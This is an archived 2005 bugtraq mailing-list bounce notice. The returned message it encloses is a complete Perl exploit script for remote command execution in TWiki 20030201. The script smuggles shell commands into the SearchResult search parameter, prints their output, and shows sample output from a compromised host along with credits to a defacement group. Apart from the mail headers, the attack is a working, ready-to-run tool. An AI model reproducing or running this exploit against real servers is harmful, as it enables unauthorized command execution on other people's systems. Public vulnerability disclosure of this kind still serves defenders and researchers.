[41272] in bugtraq


ezmlm warning

daemon@ATHENA.MIT.EDU (bugtraq-help@securityfocus.com)
Mon Nov 21 13:19:33 2005

Date: 21 Nov 2005 11:55:44 -0000
Message-ID: <1132574144.32385.ezmlm-warn@securityfocus.com>
From: bugtraq-help@securityfocus.com
To: bugtraq-redist@mit.edu
Content-type: text/plain; charset=us-ascii

Hi! This is the ezmlm program. I'm managing the
bugtraq@securityfocus.com mailing list.

I'm working for my owner, who can be reached
at bugtraq-owner@securityfocus.com.

Messages to you from the bugtraq mailing list seem to
have been bouncing. I've attached a copy of the first bounce
message I received.

If this message bounces too, I will send you a probe. If the probe bounces,
I will remove your address from the bugtraq mailing list,
without further notice.

I've kept a list of which messages from the bugtraq mailing list have 
bounced from your address.

Copies of these messages may be in the archive.

To retrieve a set of messages 123-145 (a maximum of 100 per request),
send an empty message to:
   <bugtraq-get.123_145@securityfocus.com>

To receive a subject and author list for the last 100 or so messages,
send an empty message to:
   <bugtraq-index@securityfocus.com>

Here are the message numbers:

   21990
--- Enclosed is a copy of the bounce message I received.
Return-Path: <>
Received: (qmail 19959 invoked from network); 9 Nov 2005 16:25:56 -0000
Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
  by lists2.securityfocus.com with SMTP; 9 Nov 2005 16:25:56 -0000
Received: from mail.securityfocus.com (mail.securityfocus.com [205.206.231.9])
	by outgoing3.securityfocus.com (Postfix) with SMTP id 1D9D8238A10
	for <bugtraq-return-21990-bugtraq-redist=mit.edu@lists2.securityfocus.com>; Wed,  9 Nov 2005 15:14:27 -0700 (MST)
Received: (qmail 5534 invoked by alias); 9 Nov 2005 22:44:47 -0000
Received: (qmail 3591 invoked from network); 9 Nov 2005 22:44:25 -0000
Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
  by mail.securityfocus.com with SMTP; 9 Nov 2005 22:44:25 -0000
Received: by outgoing3.securityfocus.com (Postfix)
	id 99F4D23893A; Wed,  9 Nov 2005 15:13:37 -0700 (MST)
Date: Wed,  9 Nov 2005 15:13:37 -0700 (MST)
From: MAILER-DAEMON@securityfocus.com (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: bugtraq-return-21990-bugtraq-redist=mit.edu@securityfocus.com
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
	boundary="92A5423A164.1131574411/outgoing3.securityfocus.com"
Content-Transfer-Encoding: 8bit
Message-Id: <20051109221337.99F4D23893A@outgoing3.securityfocus.com>

This is a MIME-encapsulated message.

--92A5423A164.1131574411/outgoing3.securityfocus.com
Content-Description: Notification
Content-Type: text/plain

This is the Postfix program at host outgoing3.securityfocus.com.

I'm sorry to have to inform you that your message could not be
be delivered to one or more recipients. It's attached below.

For further assistance, please send mail to <postmaster>

If you do so, please include this problem report. You can
delete your own text from the attached returned message.

			The Postfix program

<bugtraq-redist@mit.edu>: host PACIFIC-CARRIER-ANNEX.mit.edu[18.7.21.83] said:
    554 5.7.1 Message contains New UNIX virus, not accepted (in reply to end of
    DATA command)

--92A5423A164.1131574411/outgoing3.securityfocus.com
Content-Description: Delivery report
Content-Type: message/delivery-status

Reporting-MTA: dns; outgoing3.securityfocus.com
X-Postfix-Queue-ID: 92A5423A164
X-Postfix-Sender: rfc822; bugtraq-return-21990@securityfocus.com
Arrival-Date: Mon,  7 Nov 2005 14:07:22 -0700 (MST)

Final-Recipient: rfc822; bugtraq-redist@mit.edu
Action: failed
Status: 4.0.0
Diagnostic-Code: X-Postfix; host PACIFIC-CARRIER-ANNEX.mit.edu[18.7.21.83]
    said: 554 5.7.1 Message contains New UNIX virus, not accepted (in reply to
    end of DATA command)

--92A5423A164.1131574411/outgoing3.securityfocus.com
Content-Description: Undelivered Message
Content-Type: message/rfc822
Content-Transfer-Encoding: 8bit

Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
	by outgoing3.securityfocus.com (Postfix) with QMQP
	id 92A5423A164; Mon,  7 Nov 2005 14:07:22 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3468 invoked from network); 6 Nov 2005 20:00:33 -0000
Date: 7 Nov 2005 02:29:59 -0000
Message-ID: <20051107022959.363.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: GeekZ@securityfocus.com, "[at]"@securityfocus.com,
	WorldDefacers@securityfocus.com, "[d0t]"@securityfocus.com,
	NeT@securityfocus.com
To: bugtraq@securityfocus.com
Subject: TWiki 20030201 VIEW string remote command execution

#!/usr/bin/perl
#
#   TWiki 20030201 VIEW string remote command execution vulnerability
#
#   Exploit coded by runvirus    GeekZ[at]WorldDefacers[d0t]NeT
#
#
#   [root@localhost perls]$ perl twikiview.pl -h www.victim.com -p twiki/bin/view/TWiki/ -c "uname -a;id"
#
#
#    -=[    TWiki :- view string remote command execution exploit     ]=-
#    -=[                      Coded by rUnViRuS                       ]=-
#    -=[    HOST:- www.worlddefacers.net www.secuirty-arab.com        ]=-
#
#     bash-2.05b --> uname -a;id
#
#       Linux infong225 2.4.28-grsec-20050113a #1 SMP Thu Jan 13 08:59:31 CET 2005 i686 unknown
#      uid=16704(u36561933) gid=600(ftpusers)
#
#                      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
###########################################################################################
use Net::HTTP;
use Getopt::Std; getopts('h:p:c:', \%args);


if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'p'})) { $path = $args{'p'}; }
if (defined($args{'c'})) { $thecmd = $args{'c'};}else{$thecmd = "

uname -a;id";}
print STDERR "\n-=[ TWiki 20030201 VIEW string remote command 

execution vulnerability ]=-\n";
print STDERR "-=[      HOST:- www.worlddefacers.net www.secuirty-

arab.com           ]=-\n";
print STDERR "-=[                         Coded by rUnViRuS         

                ]=-\n\n";

if ((!defined($host)) || (!defined($path))) {
Usage();
}


 print "bash-2.05b --> $thecmd\n\n";
 my $s = Net::HTTP->new(Host => "$host") || die $@;
 my $thecmd=URLEncode($thecmd);
 my $count=0;
 my $skip=0;
 my $buf2;

 my $exploit="?topic=doesnotexist1%27%3B+%28$thecmd%29+%7C+sed+%27

s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l

+--+%27doesnotexist2";
  $s->write_request(GET => $path . "SearchResult?search=" . 

$exploit, 'User-Agent' => "Mozilla/5.0");
 my($code, $mess, %h) = $s->read_response_headers;

 #  ..,,;:: Parsing routine

 while (1) {
    my $buf;
    my $n = $s->read_entity_body($buf, 1024);
    die "read failed: $!" unless defined $n;
    last unless $n;
    $buf2 = $buf2 . $buf;
 }
    while (index($buf2,"__BEGIN__",$skip) != -1) {
          $from = index($buf2,"__BEGIN__",$skip);
          $count = $count +1;
          $from = $from + 9;
          $to = index($buf2,"__END__",$skip);
          $skip = $to+7;
          $chars = $to - $from;
          $grab  = substr($buf2, $from, $chars);
          if (($grab ne $oldgrab) && ($count != 1)){
             print "$grab\n";
             }
         $oldgrab = $grab;
        }
 if ( $count <= 1 ){
   print "Host not vulnerable\n";
 }

 #  ..,,;:: Encoding routine ripped from snooq

sub URLEncode {
my $theURL=$_[0];
$theURL=~ s/([\W])/"%".uc(sprintf("%2.2x",ord($1)))/eg;
return $theURL;
}

sub Usage {
print STDERR "-=[        Options:    twikiview.pl -h www.exmpl.com -p                

                ]=-
-=[       -h Victim host  .                                         

  ]=-
-=[       -p Twiki path.                                            

  ]=-
-=[                 -c Command.                                     

 ]=-\n\n";
exit;
}




--92A5423A164.1131574411/outgoing3.securityfocus.com--
